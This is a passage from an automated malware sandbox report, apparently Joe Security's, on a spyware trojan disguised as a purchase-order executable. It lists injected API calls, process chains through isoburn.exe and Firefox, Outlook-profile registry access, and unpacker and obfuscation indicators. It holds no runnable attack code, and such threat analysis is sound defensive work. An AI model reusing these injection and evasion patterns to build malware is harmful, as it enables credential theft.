            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05442DF0 NtQuerySystemInformation,LdrInitializeThunk,11_2_05442DF0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05442C60 NtCreateKey,LdrInitializeThunk,11_2_05442C60
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05442C70 NtFreeVirtualMemory,LdrInitializeThunk,11_2_05442C70
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05442CA0 NtQueryInformationToken,LdrInitializeThunk,11_2_05442CA0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05442F30 NtCreateSection,LdrInitializeThunk,11_2_05442F30
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05442FE0 NtCreateFile,LdrInitializeThunk,11_2_05442FE0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05442FB0 NtResumeThread,LdrInitializeThunk,11_2_05442FB0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05442EE0 NtQueueApcThread,LdrInitializeThunk,11_2_05442EE0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05442E80 NtReadVirtualMemory,LdrInitializeThunk,11_2_05442E80
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05442B60 NtClose,LdrInitializeThunk,11_2_05442B60
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05442BE0 NtQueryValueKey,LdrInitializeThunk,11_2_05442BE0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05442BF0 NtAllocateVirtualMemory,LdrInitializeThunk,11_2_05442BF0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05442BA0 NtEnumerateValueKey,LdrInitializeThunk,11_2_05442BA0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05442AD0 NtReadFile,LdrInitializeThunk,11_2_05442AD0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05442AF0 NtWriteFile,LdrInitializeThunk,11_2_05442AF0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054435C0 NtCreateMutant,LdrInitializeThunk,11_2_054435C0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054439B0 NtGetContextThread,LdrInitializeThunk,11_2_054439B0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05442D00 NtSetInformationFile,11_2_05442D00
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05442DB0 NtEnumerateKey,11_2_05442DB0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05442C00 NtQueryInformationProcess,11_2_05442C00
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05442CC0 NtQueryVirtualMemory,11_2_05442CC0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05442CF0 NtOpenProcess,11_2_05442CF0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05442F60 NtCreateProcessEx,11_2_05442F60
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05442F90 NtProtectVirtualMemory,11_2_05442F90
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05442FA0 NtQuerySection,11_2_05442FA0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05442E30 NtWriteVirtualMemory,11_2_05442E30
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05442EA0 NtAdjustPrivilegesToken,11_2_05442EA0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05442B80 NtQueryInformationFile,11_2_05442B80
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05442AB0 NtWaitForSingleObject,11_2_05442AB0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05443010 NtOpenDirectoryObject,11_2_05443010
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05443090 NtSetValueKey,11_2_05443090
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05443D70 NtOpenThread,11_2_05443D70
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_05443D10 NtOpenProcessToken,11_2_05443D10
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_02EE4F10 NtCreateFile,11_2_02EE4F10
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_02EE52C0 NtAllocateVirtualMemory,11_2_02EE52C0
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_02EE5040 NtReadFile,11_2_02EE5040
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_02EE5180 NtClose,11_2_02EE5180
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_02EE5100 NtDeleteFile,11_2_02EE5100
            Source: PO_YTWHDF3432.exe, 00000000.00000000.1247737261.00000000006A8000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameetn.exeH vs PO_YTWHDF3432.exe
            Source: PO_YTWHDF3432.exe, 00000000.00000002.1260659086.0000000000DEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs PO_YTWHDF3432.exe
            Source: PO_YTWHDF3432.exe, 00000000.00000002.1264411543.0000000006C50000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs PO_YTWHDF3432.exe
            Source: PO_YTWHDF3432.exe, 00000000.00000002.1261550693.0000000003B6E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs PO_YTWHDF3432.exe
            Source: PO_YTWHDF3432.exe, 00000003.00000002.1370690975.00000000019DD000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO_YTWHDF3432.exe
            Source: PO_YTWHDF3432.exe, 00000003.00000002.1370505830.0000000001378000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameISOBURN.EXEj% vs PO_YTWHDF3432.exe
            Source: PO_YTWHDF3432.exeBinary or memory string: OriginalFilenameetn.exeH vs PO_YTWHDF3432.exe
            Source: PO_YTWHDF3432.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: PO_YTWHDF3432.exeReversingLabs: Detection: 62%
            Source: PO_YTWHDF3432.exeVirustotal: Detection: 80%
            Source: PO_YTWHDF3432.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\PO_YTWHDF3432.exe C:\Users\user\Desktop\PO_YTWHDF3432.exe
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeProcess created: C:\Users\user\Desktop\PO_YTWHDF3432.exe C:\Users\user\Desktop\PO_YTWHDF3432.exe
            Source: C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exeProcess created: C:\Windows\SysWOW64\isoburn.exe C:\Windows\SysWOW64\isoburn.exe
            Source: C:\Windows\SysWOW64\isoburn.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeProcess created: C:\Users\user\Desktop\PO_YTWHDF3432.exe C:\Users\user\Desktop\PO_YTWHDF3432.exeJump to behavior
            Source: C:\Program Files (x86)\lYJnPbGqvAsrVBzAPcNbjhtdadsuOwdLkJkdJlTqjCthtZqXvtQtzjRONIHEsNRRIFDhSny\qNENczArVjafOgvC.exeProcess created: C:\Windows\SysWOW64\isoburn.exe C:\Windows\SysWOW64\isoburn.exeJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exeJump to behavior
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO_YTWHDF3432.exe.logJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeFile created: C:\Users\user\AppData\Local\Temp\7e327r58Jump to behavior
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@15/14
            Source: 0.2.PO_YTWHDF3432.exe.3ceac90.9.raw.unpack, xT9J6BTYqcjiUV51b1.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.PO_YTWHDF3432.exe.3d61ab0.10.raw.unpack, xT9J6BTYqcjiUV51b1.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.PO_YTWHDF3432.exe.6c50000.13.raw.unpack, xT9J6BTYqcjiUV51b1.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.PO_YTWHDF3432.exe.3ceac90.9.raw.unpack, a8QWheE1fArtTd1IMD.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.PO_YTWHDF3432.exe.3ceac90.9.raw.unpack, a8QWheE1fArtTd1IMD.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.PO_YTWHDF3432.exe.3ceac90.9.raw.unpack, a8QWheE1fArtTd1IMD.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.PO_YTWHDF3432.exe.6c50000.13.raw.unpack, a8QWheE1fArtTd1IMD.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.PO_YTWHDF3432.exe.6c50000.13.raw.unpack, a8QWheE1fArtTd1IMD.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.PO_YTWHDF3432.exe.6c50000.13.raw.unpack, a8QWheE1fArtTd1IMD.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.PO_YTWHDF3432.exe.3d61ab0.10.raw.unpack, a8QWheE1fArtTd1IMD.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.PO_YTWHDF3432.exe.3d61ab0.10.raw.unpack, a8QWheE1fArtTd1IMD.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.PO_YTWHDF3432.exe.3d61ab0.10.raw.unpack, a8QWheE1fArtTd1IMD.csSecurity API names: _0020.AddAccessRule
            Source: PO_YTWHDF3432.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dllJump to behavior
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\SysWOW64\isoburn.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: PO_YTWHDF3432.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: PO_YTWHDF3432.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: PO_YTWHDF3432.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: firefox.pdbP source: isoburn.exe, 0000000B.00000003.1542849657.000000000848D000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 0000000B.00000003.1594930658.0000000008540000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: etn.pdbSHA256 source: PO_YTWHDF3432.exe
            Source: Binary string: isoburn.pdb source: PO_YTWHDF3432.exe, 00000003.00000002.1370505830.0000000001378000.00000004.00000020.00020000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000A.00000002.3730663846.0000000000678000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: isoburn.pdbGCTL source: PO_YTWHDF3432.exe, 00000003.00000002.1370505830.0000000001378000.00000004.00000020.00020000.00000000.sdmp, qNENczArVjafOgvC.exe, 0000000A.00000002.3730663846.0000000000678000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: qNENczArVjafOgvC.exe, 0000000A.00000002.3723257708.000000000008E000.00000002.00000001.01000000.0000000C.sdmp, qNENczArVjafOgvC.exe, 0000000D.00000002.3723154626.000000000008E000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: wntdll.pdbUGP source: PO_YTWHDF3432.exe, 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 0000000B.00000003.1372373369.0000000005227000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 0000000B.00000003.1370546693.0000000005072000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 0000000B.00000002.3733177087.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 0000000B.00000002.3733177087.000000000556E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: PO_YTWHDF3432.exe, PO_YTWHDF3432.exe, 00000003.00000002.1370690975.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, isoburn.exe, 0000000B.00000003.1372373369.0000000005227000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 0000000B.00000003.1370546693.0000000005072000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 0000000B.00000002.3733177087.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 0000000B.00000002.3733177087.000000000556E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: etn.pdb source: PO_YTWHDF3432.exe
            Source: Binary string: firefox.pdb source: isoburn.exe, 0000000B.00000003.1542849657.000000000848D000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 0000000B.00000003.1594930658.0000000008540000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            .NET source code contains potential unpacker
            Source: 0.2.PO_YTWHDF3432.exe.3ceac90.9.raw.unpack, a8QWheE1fArtTd1IMD.cs.Net Code: uDSZQIBs3w System.Reflection.Assembly.Load(byte[])
            Source: 0.2.PO_YTWHDF3432.exe.89f0000.14.raw.unpack, RFebBaClhEWIFvwxqU.cs.Net Code: System.Reflection.Assembly.Load(byte[])
            Source: 0.2.PO_YTWHDF3432.exe.3d61ab0.10.raw.unpack, a8QWheE1fArtTd1IMD.cs.Net Code: uDSZQIBs3w System.Reflection.Assembly.Load(byte[])
            Source: 0.2.PO_YTWHDF3432.exe.29b5318.3.raw.unpack, RFebBaClhEWIFvwxqU.cs.Net Code: System.Reflection.Assembly.Load(byte[])
            Source: 0.2.PO_YTWHDF3432.exe.29e4b30.5.raw.unpack, RFebBaClhEWIFvwxqU.cs.Net Code: System.Reflection.Assembly.Load(byte[])
            Source: 0.2.PO_YTWHDF3432.exe.6c50000.13.raw.unpack, a8QWheE1fArtTd1IMD.cs.Net Code: uDSZQIBs3w System.Reflection.Assembly.Load(byte[])
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 0_2_049D5005 push FFFFFF8Bh; iretd 0_2_049D5007
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 0_2_08A5DB20 push es; ret 0_2_08A5DB30
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0042B882 push eax; ret 3_2_0042B884
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_00401887 push ebp; retf 3_2_00401889
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0040509B push FFFFFFF5h; ret 3_2_0040509F
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0040D1DC pushad ; retf 3_2_0040D1E9
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_004049AE push ebp; retf 3_2_004049B0
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_00401A15 push esp; retf 3_2_00401A2F
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_004032D0 push eax; ret 3_2_004032D2
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_00413AD2 push ebp; retf 3_2_00413AD5
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_00401AF6 push ebp; iretd 3_2_00401AFA
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_00407C3E push ecx; ret 3_2_00407C51
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0040CD3A push edx; ret 3_2_0040CD3B
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_00404DF4 push ebp; retf 3_2_00404DF8
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_00429603 push edi; ret 3_2_0042960C
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0041AE3A push ebp; retf 3_2_0041AE3B
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_0040175B push ebp; retf 3_2_00401774
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018B225F pushad ; ret 3_2_018B27F9
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018B27FA pushad ; ret 3_2_018B27F9
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018E09AD push ecx; mov dword ptr [esp], ecx3_2_018E09B6
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018B283D push eax; iretd 3_2_018B2858
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018B1368 push eax; iretd 3_2_018B1369
            Source: C:\Users\user\Desktop\PO_YTWHDF3432.exeCode function: 3_2_018B9939 push es; iretd 3_2_018B9940
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_053D27FA pushad ; ret 11_2_053D27F9
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_053D225F pushad ; ret 11_2_053D27F9
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_054009AD push ecx; mov dword ptr [esp], ecx11_2_054009B6
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_053D283D push eax; iretd 11_2_053D2858
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_053D1365 push eax; iretd 11_2_053D1369
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_02EE2373 pushad ; retf 11_2_02EE2376
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_02EE632C push edi; ret 11_2_02EE6339
            Source: C:\Windows\SysWOW64\isoburn.exeCode function: 11_2_02EE6330 push edi; ret 11_2_02EE6339
            Source: PO_YTWHDF3432.exeStatic PE information: 0x8451EF9E [Mon May 7 00:11:10 2040 UTC]
            Source: initial sampleStatic PE information: section name: .text entropy: 7.9060088345737976
            Source: 0.2.PO_YTWHDF3432.exe.3ceac90.9.raw.unpack, BErXB0rynt92BiVXuGp.csHigh entropy of concatenated method names: 'iVQpjl5DRB', 'AX7pFqdIw9', 'QNvpQQsIQa', 'cGepX6k6K9', 'ikipYv13dQ', 'rBmptfWOMZ', 'kTiplde5E7', 'ttGpTQxsac', 'HrjpMtWEUA', 'awSpdSTDfP'
            Source: 0.2.PO_YTWHDF3432.exe.3ceac90.9.raw.unpack, R3MsDW5Ft4b7TnIado.csHigh entropy of concatenated method names: 'LmRBj9msZM', 'xSdBFEyWw6', 'zDfBQgqHMJ', 'iApBXJiMrV', 'oIpBYHHAUA', 'Q6nBt6e8Vs', 'Is7BlTlKvh', 'U6PBTZdWSS', 'ArOBMDkNP1', 'SDCBdgTV8w'
            Source: 0.2.PO_YTWHDF3432.exe.3ceac90.9.raw.unpack, sY7H7rmOFKuJuJyqYu.csHigh entropy of concatenated method names: 't94RiIFpSH', 'r5aRAF02mj', 'VU1xyesDvL', 'cifxrSWD4D', 'OsER3AmR9q', 'sGbR74KV45', 'R3DRcjEDf3', 'GobR9KS5WL', 'QJCRs2VySV', 'ntGRKHuFYF'
            Source: 0.2.PO_YTWHDF3432.exe.3ceac90.9.raw.unpack, k4iOvJ9qBQE1HdxkNd.csHigh entropy of concatenated method names: 'ppeShtPhhQ', 'e9CS7vOYd2', 'oWHS9OOF4P', 'UsiSsf4AL6', 'fpUS6ZpLxb', 'LXPSagvaeU', 'Kt1SJtnq8o', 'Cv3SVoAITs', 'MvwSuIBAut', 'pUYSgphCvG'
            Source: 0.2.PO_YTWHDF3432.exe.3ceac90.9.raw.unpack, FUwdh2deYQx2wHTHN8.csHigh entropy of concatenated method names: 'oWMCYaVMXA', 'zCXClWFyd9', 'pcmna6ILWH', 'tjenJmJim7', 'SYSnVeQiK0', 'AprnuUcyxa', 'Rd7ngguePT', 'B4PnHe7xGP', 'BNJn5PQdSK', 'cEDnhHOZk0'
            Source: 0.2.PO_YTWHDF3432.exe.3ceac90.9.raw.unpack, IFmal6MnO9XewkWInC.csHigh entropy of concatenated method names: 'ntpnXqPgbt', 'gKxnt5WGvY', 'XttnTitswg', 'JpWnMI5vYs', 'c1HnSXRqPF', 'xCbnO4laVe', 'bZBnRwjdHr', 'J1VnxsgSFR', 'NpNnpL4X3Y', 'JEenIQA4CN'
            Source: 0.2.PO_YTWHDF3432.exe.3ceac90.9.raw.unpack, a8QWheE1fArtTd1IMD.csHigh entropy of concatenated method names: 'XoWNU7NHJf', 'eIgNqnRRjf', 'jj2Nw2qd5l', 'zemNnAIayF', 'Lc3NCZwy9O', 'ym6NvErXSP', 'FMlNBbQQYM', 'CI7NEDQ3Gw', 'm8VNb4krDL', 'MO9NoCpJfn'
            Source: 0.2.PO_YTWHDF3432.exe.3ceac90.9.raw.unpack, FyGb7yelJ0UQmvijnD.csHigh entropy of concatenated method names: 'sV0Q4crj8', 'FkTXDGU6X', 'qcptoQdjw', 'PAYlLyOH4', 'nW9MjcUgs', 'RAmdradxQ', 'XcY2dF3gTnIuB9MNE0', 'MJb9cAUqNNYSbZqInA', 'jSJxxrqmJ', 'S5PIWSIMd'
            Source: 0.2.PO_YTWHDF3432.exe.3ceac90.9.raw.unpack, WSEWP1cm6Y0WOLwaHL.csHigh entropy of concatenated method names: 'f7b4THXssr', 'mbB4MTbNvi', 'AJJ4kycBII', 'm5Z46eIlgC', 'WCt4JRAvVY', 'ECD4VFKvHY', 'Sf14gJos9q', 'Gys4Hgajkq', 'uTy4hSAnCI', 'DpI43725qO'
            Source: 0.2.PO_YTWHDF3432.exe.3ceac90.9.raw.unpack, TgQR0kzFV7P8eTbCZ5.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'T4bp4OcUmy', 'cnxpSRTVAj', 'gTrpO3PVPI', 'jHtpRkHVDa', 't0RpxlqyJL', 'allppiNwGn', 'eZgpIvKRFI'
            Source: 0.2.PO_YTWHDF3432.exe.3ceac90.9.raw.unpack, OibhrkrNhBZqI9i9ql8.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ENZI9DLX0M', 'SeMIshMD14', 'RnmIKSmpmG', 'BuEIGQ4ijM', 'z72I0fLRXg', 'vJdImt7iVc', 'FHFIL6nk4I'
            Source: 0.2.PO_YTWHDF3432.exe.3ceac90.9.raw.unpack, GS1UTMAPYbZYfF8Vl4.csHigh entropy of concatenated method names: 'ipAprNkVrh', 'CnbpNug8Ku', 'GKnpZBt03Y', 'FC8pq9qmYi', 'vGIpwaAntI', 'Dc1pC1DDWK', 'vrUpvOVSxm', 'u9WxLHDLI4', 'baexibvdA4', 'Nsvx8Z8nOQ'
            Source: 0.2.PO_YTWHDF3432.exe.3ceac90.9.raw.unpack, kqvlLgwHelwGGavCWV.csHigh entropy of concatenated method names: 'Dispose', 'Jytr8TyEFt', 'dpSe6m22Zw', 's6bddSHJII', 'e1lrA83SRi', 'wpdrz6Ldws', 'ProcessDialogKey', 'y2reyKWvcM', 'ocJer0vxQs', 'NdyeekS1UT'
            Source: 0.2.PO_YTWHDF3432.exe.3ceac90.9.raw.unpack, Jh3cp6k9XQgj8BWZQV.csHigh entropy of concatenated method names: 'KcmvUruQgJ', 'uhGvwMDnOf', 'AJcvCYo1Oc', 'D97vBPmccH', 'bx1vEXxVYV', 'JHJC0puqpd', 'kJZCmfme1u', 'qZZCLERCIG', 'hETCixsNGk', 'T5ZC8WJwqD'
            Source: 0.2.PO_YTWHDF3432.exe.3ceac90.9.raw.unpack, B8ssm5gnwOgkecqMjA.csHigh entropy of concatenated method names: 'tefBqxTWLr', 'pohBny6sPo', 'llhBvawbod', 'AXmvApwsB9', 'dIKvz8Avd2', 'pJAByHpIFc', 'UUTBrqPGDr', 'f8YBe8sB33', 'eMTBNPANAC', 'R2LBZg1F9q'
            Source: 0.2.PO_YTWHDF3432.exe.3ceac90.9.raw.unpack, xT9J6BTYqcjiUV51b1.csHigh entropy of concatenated method names: 'STPw9TtYeG', 'QnTwsZOuQl', 'uejwK5H5dc', 'm7jwGG1vxT', 'oaHw0bj6jN', 'WXHwmCSjdV', 'TVywL9iB2x', 'm8iwiXLmc1', 'apFw88auGE', 'c9wwApWaBt'
            Source: 0.2.PO_YTWHDF3432.exe.3ceac90.9.raw.unpack, aKWvcM8ScJ0vxQshdy.csHigh entropy of concatenated method names: 'zDvxks7mu2', 'Dffx6RAwR2', 'yV7xak68hj', 'HWExJyAMmo', 'PTNx9wnOMd', 'CRrxVCUfRk', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.PO_YTWHDF3432.exe.3ceac90.9.raw.unpack, g3pKYLrrgIkl0W0EPMM.csHigh entropy of concatenated method names: 'ToString', 'aNyINZw7k4', 'KBuIZ25m1y', 'LVmIUAfpxS', 'CHIIqTclxV', 'jWmIwvsp77', 'ygSInp8klX', 'P3ZICqg684', 'GqyfZVHI7rP8WTF426r', 'DNF68QHAUATQjq3LBES'
            Source: 0.2.PO_YTWHDF3432.exe.3ceac90.9.raw.unpack, OZDCYLZlMddJBkkgKb.csHigh entropy of concatenated method names: 'TU1rBT9J6B', 'BqcrEjiUV5', 'HnOro9Xewk', 'tInrDCdUwd', 'MTHrSN8Vh3', 'Qp6rO9XQgj', 'o2rbfBtD9twMm2O23y', 'nP7R5H26kjZXwCmhtY', 'C4arrjy5Vq', 'V7LrNHvg8t'
            Source: 0.2.PO_YTWHDF3432.exe.3ceac90.9.raw.unpack, pwTTJeKkybpsv2KU7P.csHigh entropy of concatenated method names: 'ToString', 'MUpO3mwciV', 'RKwO6dF8mK', 'PGHOaxXCT3', 'OZgOJMsTVo', 'PnXOVJ0heI', 'j6YOukL5MC', 'qCeOgjLOFe', 'OmfOHyxNUs', 'j6HO56W17l'
            Source: 0.2.PO_YTWHDF3432.exe.3ceac90.9.raw.unpack, YHUuMtG110d5GW4jFQ.csHigh entropy of concatenated method names: 'eV6RoQsrWv', 'P08RDWeh9V', 'ToString', 'fnLRq8cfhU', 'bGtRw5m3fI', 'HciRnA2bQ2', 'IeVRCxMhWT', 'CdNRvS0JQL', 'r3KRBINfFy', 'Qr8REdBAD5'
            Source: 0.2.PO_YTWHDF3432.exe.3ceac90.9.raw.unpack, wl83SRiifpd6LdwsF2.csHigh entropy of concatenated method names: 'xVWxqqGAsr', 'sklxwIw6EC', 'jytxnka9rZ', 'd1AxC85BP2', 'vdIxvbkPgh', 'cNRxBV86j5', 'SPPxEO1adU', 'SS8xblBROH', 'GRIxoF4dvr', 'ogwxDH8nlg'
            Source: 0.2.PO_YTWHDF3432.exe.3d61ab0.10.raw.unpack, BErXB0rynt92BiVXuGp.csHigh entropy of concatenated method names: 'iVQpjl5DRB', 'AX7pFqdIw9', 'QNvpQQsIQa', 'cGepX6k6K9', 'ikipYv13dQ', 'rBmptfWOMZ', 'kTiplde5E7', 'ttGpTQxsac', 'HrjpMtWEUA', 'awSpdSTDfP'
            Source: 0.2.PO_YTWHDF3432.exe.3d61ab0.10.raw.unpack, R3MsDW5Ft4b7TnIado.csHigh entropy of concatenated method names: 'LmRBj9msZM', 'xSdBFEyWw6', 'zDfBQgqHMJ', 'iApBXJiMrV', 'oIpBYHHAUA', 'Q6nBt6e8Vs', 'Is7BlTlKvh', 'U6PBTZdWSS', 'ArOBMDkNP1', 'SDCBdgTV8w'
            Source: 0.2.PO_YTWHDF3432.exe.3d61ab0.10.raw.unpack, sY7H7rmOFKuJuJyqYu.csHigh entropy of concatenated method names: 't94RiIFpSH', 'r5aRAF02mj', 'VU1xyesDvL', 'cifxrSWD4D', 'OsER3AmR9q', 'sGbR74KV45', 'R3DRcjEDf3', 'GobR9KS5WL', 'QJCRs2VySV', 'ntGRKHuFYF'
